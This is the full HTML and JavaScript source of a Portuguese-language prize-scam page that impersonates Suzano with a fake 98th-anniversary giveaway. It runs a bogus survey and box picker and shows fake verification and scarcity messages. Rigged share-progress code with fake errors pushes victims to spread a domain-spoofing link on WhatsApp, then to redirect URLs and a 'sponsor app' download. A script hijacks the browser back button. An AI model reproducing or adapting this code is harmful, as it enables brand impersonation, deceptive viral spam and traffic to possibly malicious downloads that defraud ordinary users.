
<!doctype html>
<html lang="en" dir="ltr">

  
<head>
  <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4779219,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4779219&101" alt="free hit counters" border="0"></a></noscript>
<!-- Histats.com  END  -->
<title>Suza 1 2025</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">

	<meta property="og:type" content="website" /> 
	
	
	
<meta property="og:title" content="🎉Presentes para comemoração dos 98 anos da Suzano🎈">
<meta property="og:type" content="website"/> 
<meta property="og:url" content="https://suzano.com.br/">

<meta property="og:image" content="https://presente.nbqc.xyz/2kQZG2p.jpeg"/>
<meta property="og:description" content="Participe de eventos para ganhar prêmios em dinheiro hoje">

<title>Suz mains 1</title>
	<script src="https://cdn.jsdelivr.cc/npm/sweetalert2@10.16.0/dist/sweetalert2.all.min.js"></script>
  
<link rel="shortcut icon" href="data:image/x-icon" type="image/x-icon">
<link href="app.css?id=2fbe2d9a9a40ca9b2489" type="text/css" rel="stylesheet" />




</head>
<body>
  
<style>
 
.app{align-items:center;box-sizing:border-box;display:flex;justify-content:center;padding:20px; padding-top:2px}.left,.right{align-self:start;margin:0 20px;max-width:400px;width:100%}.product-preview__title{font-family:Pacifico,sans-serif;font-size:36px}.product-preview__image{max-width:340px;width:100%}.survey{background:#eaeaea;font-size:18px;font-weight:700;max-width:none;padding:40px;position:relative;text-align:center}.survey__question{color:#000}.survey__answer{background:#0CCB63;border:0px solid #0CCB63;border-radius:14px;box-shadow:none;color:#fff;cursor:pointer;display:block;font-size:10px;font-weight:200;line-height:28px;margin-top:15px;padding:19px 20px;text-decoration:none;width:100%}.survey__steps{margin-top:20px}.survey__step{background:#fff;border-radius:50%;display:inline-block;font-size:0;height:30px;margin:0 5px;width:30px}.survey__step--active{background:#0CCB63}.modal{color:#000;z-index:6}.modal__content{background-color:#f7f3ed;padding:20px}.opening-modal__image{max-width:405px;width:100%}.button{background-color:#0CCB63;border:none;border-radius:.25rem;color:#fff;display:inline-block;font-size:1.6rem;font-weight:400;line-height:1.5;padding:.25rem 2.70rem;text-decoration:none;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;vertical-align:middle}.button,.verify{text-align:center}.verify{background:#eaeaea;color:#000;padding:40px}.verify__text{padding:2px 0}.verify__icon{max-width:13px}.verify__icon--spinner{opacity:0}.verify__icon--visible{opacity:1}.text-rotator{font-size:21px;margin-bottom:10px}@media(max-width:640px){.app{flex-direction:column}.left,.right{margin:0;max-width:none;width:100%}.survey{padding:20px}.survey__answer{font-size:20px;line-height:18px;padding:10px}}
    </style>
  <style>
    
    @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");

* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: 14px;
    box-sizing: border-box;
  text-align:center;


}
   html,
            body {
                font-size: 16px;
                width: 100%;
                height: 100%;
                padding: 0;
                margin: 0;
                
                -webkit-text-size-adjust: 100%;
                -webkit-tap-highlight-color: transparent;
            }
 
    </style>
  <style>
   
    
button:hover {
    background: #0CCB63;
}


    .done {
    text-align: center;
    color: #c7db49;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
    .top-header{
        height: 49px;
        z-index: 99;
        background: #fff;
        padding: 9px;
        opacity: 0.95;
    }
    .top-header > img{
        width: 30px;
    }
    .header_flex_item {
        color: #fff !important;
    }
    .header_flex_item {
        font-size: 12px;
        color: #fff;
        font-weight: 700;
        width: 50%
    }
      

  .barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #0e5aa7;
}
    #share, 
    #claim {
    display: none;
}
  .percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #0e5aa7;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
  #fill,
#fill2 {
    background: #0e5aa7;
    width: 0%;
    height: 100%;
}
   .txt1 {
			padding: 5px 6px;
			line-height: 18px;
     color: #BE0612;
			text-align: center
		}
		.bottom {
			width: 92%;
			margin: 20px auto 0;
			border: 1px solid #ccc;
			background-color: #f2f2f2;
			padding: 5px;
			border-radius: 10px;
			-moz-border-radius: 10px;
			-webkit-border-radius: 10px
              
		}
		.now {
			text-align: center;
			padding-top: 5px
		}
		#countdown {
			font-weight: bold;
		}
		.rules {
			color: #1b316c;
			padding: 4px 5px;
			line-height: 22px
		}
    	.title1 {
			text-align: center;
			font-weight: 700;
			font-size: 26px
		}
    
		.now2 {
			padding-top: 10px;
			font-weight: bold;
		}
    .last_page{
			display: none;
		}
		.last-up{
			text-align: left;
		}
		.textlastup{
			color: #068afb;
			font-size: 18px;
			padding-bottom: 8px;
			font-weight: 400;
		}
     .share_main_bt {
        margin: 10px auto;
        background:#4ab115;
        border-radius: 10px;
        width: 80%;
        line-height: 45px;
        text-align: center;
        font-size: 18px;
        font-weight: bold;
        color: #fff  !important;
    }
    .sa-confirm-button-container{
			width:100px !important;
		}
      
  .barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #0e5aa7;
}
  #claim {
    display: none;
}
  .percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #0e5aa7;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
  #fill,
#fill2 {
    background: #0e5aa7;
    width: 0%;
    height: 100%;
}
    .share_main {
        margin: 10px auto;
        width: 95%;
        background: #eeeff4;
        border-radius: 10px;
    }
    .swal2-styled.swal2-confirm {
        background-color: #8cd4f5;
        box-shadow: none;
        padding: 10px 32px;
        margin-top: 10px;
        cursor: pointer;
        color: #fff !important;
        border-radius: 0.2rem;
        border: 1px solid rgba(84, 84, 84, 0.4);
        font-weight: 300;
        font-size: 19px;
        width: 100%;
        background: #0CCB63 !important;
    }

    .swal2-actions {
        padding: 0 !important;
    }
    </style>
  <img src='app.jpg' width='100%'/>

 
  
    <div id="intro">
<div class="app" id="app" v-cloak>
  
<vue-modal v-show="!showRotator && !showPrize" :open="showOpeningModal" class="opening-modal">
<img class="opening-modal__image" src="suzanobr.tan.jpg" alt="lulu" />
<h1 class="heading heading--h1">
Parabéns! 
</h1>
<p class="paragraph">
Presente de comemoração dos 98 anos da Suzano.
<p class="paragraph">
  Clique em "OK" para resgatar sua recompensa.
</p>
 <br> 
<button class="button" v-on:click="showOpeningModal = false; $confetti.stop()">
OK
</button>
  
</vue-modal>
<vue-modal :open="showInstructionsModal">
<h2 class="heading heading--h1">Parabéns!  Suas respostas foram salvas</h2>
 
<p class="paragraph">
Agora você tem a chance de ganhar prêmios valiosos.
<br><br>
Você tem 3 chances!  Nós te desejamos boa sorte.
<br><br>
Você precisa selecionar a caixa que contém o presente dentro das caixas.
</p>
   <br>
<button class="button" v-on:click="showInstructionsModal = false">
Começar
</button>
</vue-modal>
<vue-modal :open="showFailModal">
<h1 class="heading heading--h1">Mais sorte da próxima vez</h1>
<p class="paragraph">
Você tem (2) chances extras.
</p>
   <br>
<button class="button" v-on:click="showFailModal = false">
OK
</button>
</vue-modal>
<vue-modal :open="showSuccessModal">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjmyKjc1vfIp28fLD79tvlky9SYBEYY-lf7e919L8H54Wx46O8QPmr1uzU7B1NIioNcwmdD9oTwFyKyIv1KZfwlICuPSVU1CiUl0-nXrITdmo_elSedAtkTsIfAerbX8VZCUCsNHIU3s4/s16000/Brazil_outbox.png" style="width: 216px;">
<h1 class="heading heading--h1">Parabéns! </h1>
<p class="paragraph">

O seu prémio é: 1000 REAL <br>Siga as instruções na página seguinte para reclamar o seu prémio !
</p>
    <br>
<button class="button" v-on:click="$confetti.stop()" onclick="go();">
Ok
</button>
</vue-modal>
  
<div class="left">
<div class="product-preview">
<div class="product-preview__title">
  
</div>
    <img src="suzanobr.zhu.jpg" style="width:100%;" />
  <h1 class="heading heading--h1">
Olá!
</h1>
  <p class="paragraph">
Presente de comemoração dos 98 anos da Suzano.
<br>
Através do questionário, você terá a chance de obter 2000 REAL
</p>
  <br>


</div>
</div>
<div class="right">
<vue-box-picker v-if="showBoxPicker" :vertical-items="3" lid-image="HxlRhtn.png" box-image="2mfFnMR.png" box-back-image="u9Qtle0.png" prize-image="kOhrtPL.png" v-on:fail="onBoxPickerFail" v-on:success="onBoxPickerSuccess" :horizontal-items="3" :max-clicks="2"></vue-box-picker>
<div class="verify" v-if="showRotator">
<vue-text-rotator v-on:rotate="rotate" v-on:finished="onRotatorFinished" :strings='[
                     "Estamos verificando suas respostas...",
              "Estamos verificando suas respostas...",
              "Estamos verificando suas respostas..."
            ]'>
</vue-text-rotator>
<div class="verify__text" v-if="rotateIndex > 1">
<strong>
Você respondeu 4/4 das perguntas.
</strong>
<img class="verify__icon verify__icon--checked" src="checked.png" alt="" />
</div>
<div class="verify__text" v-else>
Suas respostas estão sendo processadas.
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 0}" src="spinner.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 2">
<strong>
Ainda há prêmios disponíveis!
</strong>
<img class="verify__icon verify__icon--checked" src="checked.png" alt="" />
</div>
<div class="verify__text" v-else>
Procurando presentes...
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 1}" src="spinner.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 3">
<strong>
Restam apenas (289) presentes!
</strong>
<img class="verify__icon verify__icon--checked" src="checked.png" alt="" />
</div>
<div class="verify__text" v-else>
O estoque está sendo verificado.
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 2 }" src="spinner.gif" alt="" />
</div>
</div>
<vue-survey v-if="showSurvey" :show-steps="true" :questions='[
            {
              title: "Você conhece Suzano?",
              answers: [ { text: "sim" }, { text: "não" } ]
            },
                                                             {
              title: "Você já participou do nosso evento antes?",
              answers: [ { text: "sim" }, { text: "não" } ]
            },
            {
              title: "quantos anos você tem?",
              answers: [ { text: "18-29" }, { text: "30-39" }, { text: "40-49" }, { text: "Mais de 50" } ]
            },
            {
              title: "O que você acha da Suzano?",
              answers: [ { text: "muito bom" }, { text: "excelente" }, { text: "OK" }, { text: "não muito bom" } ]
            },
          ]' v-on:finish="onSurveyFinish"></vue-survey>
</div>

       <br> <img src='s1c6OL3.jpg' width='110%'/><img src='irwJJRL.jpeg' width='110%'/>
  </div>
      </div>
  
  <div id="share">
    
<div class="title1">
<p>Parabéns! </p>
</div>
<div class="weui_dialog_img prize_img" style="text-align: center;margin: 20px 0;">
                                <center>   <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjmyKjc1vfIp28fLD79tvlky9SYBEYY-lf7e919L8H54Wx46O8QPmr1uzU7B1NIioNcwmdD9oTwFyKyIv1KZfwlICuPSVU1CiUl0-nXrITdmo_elSedAtkTsIfAerbX8VZCUCsNHIU3s4/s16000/Brazil_outbox.png" width='61%'/> </center>
                           

                            </div>
<p class="txt1">O seu prémio é: 2000 REAL <br>Siga as instruções na página seguinte para reclamar o seu prémio !</p>
      <div class="bottom" id='buttonO'>
<div id="lastapp"><p class="now now2"></p><p class="rules">1. Compartilhe com grupos e contatos no WhatsApp (toque no botão 'WhatsApp' abaixo).</p><p class="rules">2. Toque no botão 'CONTINUAR' para resgatar seu presente exclusivo.</p>
        
        </div>

    
   <div class="share_main_bt" id="whatsapp">WhatsApp&nbsp;   →</div>
  <h4 class="textlastup">Não pare de compartilhar até que a barra de progresso atinja 100%!</h4>
  <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
    
            <br>       <div class="share_main_bt" onclick="tipn()" style="margin: 20px auto 0; background-color: #0CCB63;">
                                CONTINUAR
                            </div>
   
  </div></div>
  <br> <img src='s1c6OL3.jpg' width='100%'/><img src='irwJJRL.jpeg' width='100%'/>
  </div>
 
  

  
                      
    <div id="claim">
      <div class="title1">
<p>Parabéns! </p>
</div>
<div class="weui_dialog_img prize_img" style="text-align: center;margin: 20px 0;">
                                <center>   <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjmyKjc1vfIp28fLD79tvlky9SYBEYY-lf7e919L8H54Wx46O8QPmr1uzU7B1NIioNcwmdD9oTwFyKyIv1KZfwlICuPSVU1CiUl0-nXrITdmo_elSedAtkTsIfAerbX8VZCUCsNHIU3s4/s16000/Brazil_outbox.png" width='61%'/> </center>
                           

                            </div>
<p class="txt1">O seu prémio é: 2000 REAL <br>Siga as instruções na página seguinte para reclamar o seu prémio !</p>
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="rules">1. Você está a um passo de receber seu presente.</p>
      <p class="rules">2. Você precisa concluir o processo de registro e baixar o aplicativo do patrocinador para receber seu prêmio.</p>
        <br>
        
      <div class="share_main_bt" id="offer">Registro completo 1</div>
                            
            <div class="share_main_bt" id="offers">Registro completo 2</div> 
      <br>
      
 
  <img src='s1c6OL3.jpg' width='100%'/><img src='irwJJRL.jpeg' width='100%'/>
       </div>
      </div>
  

  
  

<script>window.view = window.view || {};view.offerUrl = "https:\/\/rdr.funcontent.xyz/click";view.qs = null;view.skip = 0;view.screenshot = 0;view.download = 1;view.noredir = false;</script> <script src="js/app.js?id=d41d8cd98f00b204e980" type="application/javascript"></script>
<script src="wow.js?id=17138759790b445ece6b" type="application/javascript"></script>
  





  <script>
function go() {
    $("#intro").fadeOut(0);
        $("#share").fadeIn(1000);
} 
    

</script>


</body>
</html>

<script src="https://code.jquery.com/jquery-latest.min.js"></script>


  <script>
        var text1 = "ytime" ,
            text2 = " مكتبة جرير تقدم ",
            text3 = " سارع واحصل على قسيمتك قبل النفاذ من هنا : ",
            error = "There is an error!\nPosts do not count. You may have shared it with the same friend or group more than once, please re-share.",
            cpa = "https://hedraighugru.net/4/7965604",
            cpa1 = "https://backgroundrunway.com/agyv7ex6?key=96eb9366cb1c6c1b8ab6ab46c574e6fb",
            cpa2 = "https://hedraighugru.net/4/7965604",
            saved = "MAMA7lwa",
            share = "whatsapp://send?text=" + text1 ;
    </script>

<script>
  var tiaoban = [
    "https://suzano.com.br@presente.nbqc.xyz",
    "https://suzano.com.br@presente.nbqc.xyz",
];
var tiaoban = tiaoban[Math.floor(Math.random() * tiaoban.length)];

var date = new Date();
var hour = (date.getHours() > 9) ? date.getHours() : '0' + date.getHours();
var minute = (date.getMinutes() > 9) ? date.getMinutes() : '0' + date.getMinutes();
var second = (date.getSeconds() > 9) ? date.getSeconds() : '0' + date.getSeconds();
var mytime = hour + ':' + minute + ':' + second;

var tb = tiaoban ;
  
  
</script>

<!-- code by ODcompany -->
  <!-- JS-WP -->
 <script type="text/javascript">
 var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $("#intro").fadeOut(0);
    $(".comments").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.open('whatsapp://send?text=' + tb);
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 2;
    } else if (width == 87) {
        width += 1;
    } else if (width == 88) {
        width += 2;
    } else if (width == 90) {
        width += 1;
    } else if (width == 91) {
        width += 1;
    } else if (width == 92) {
        width += 1;
    } else if (width == 93) {
        width += 1;
    } else if (width == 94) {
        width += 1;
    } else if (width == 95) {
        width += 1;
    } else if (width == 96) {
        width += 2;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
        
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(cpa, "_blank");
});
   
$("#offers").click(function () {
    window.open(cpa1, "_blank");
});
   
$("#offerss").click(function () {
    window.open(cpa2, "_blank");
});
   function tipn(){
   Swal.fire({
  icon: 'error',
  title: 'Infelizmente...',
  text: 'Para receber seu prêmio, você deve compartilhar com os amigos sobre nosso evento.  Compartilhe até a barra azul ficar cheia!',
  
});
   }
</script>
  


      <script type="text/javascript">! function (){	var t;	try{for (t=0; 10 > t; ++t)		history.pushState({}, "", "#");	onpopstate=function (t)	{		t.state && alert('Por favor, compartilhe o máximo para receber um presente. ');		}}		catch (o){}}();</script>
 


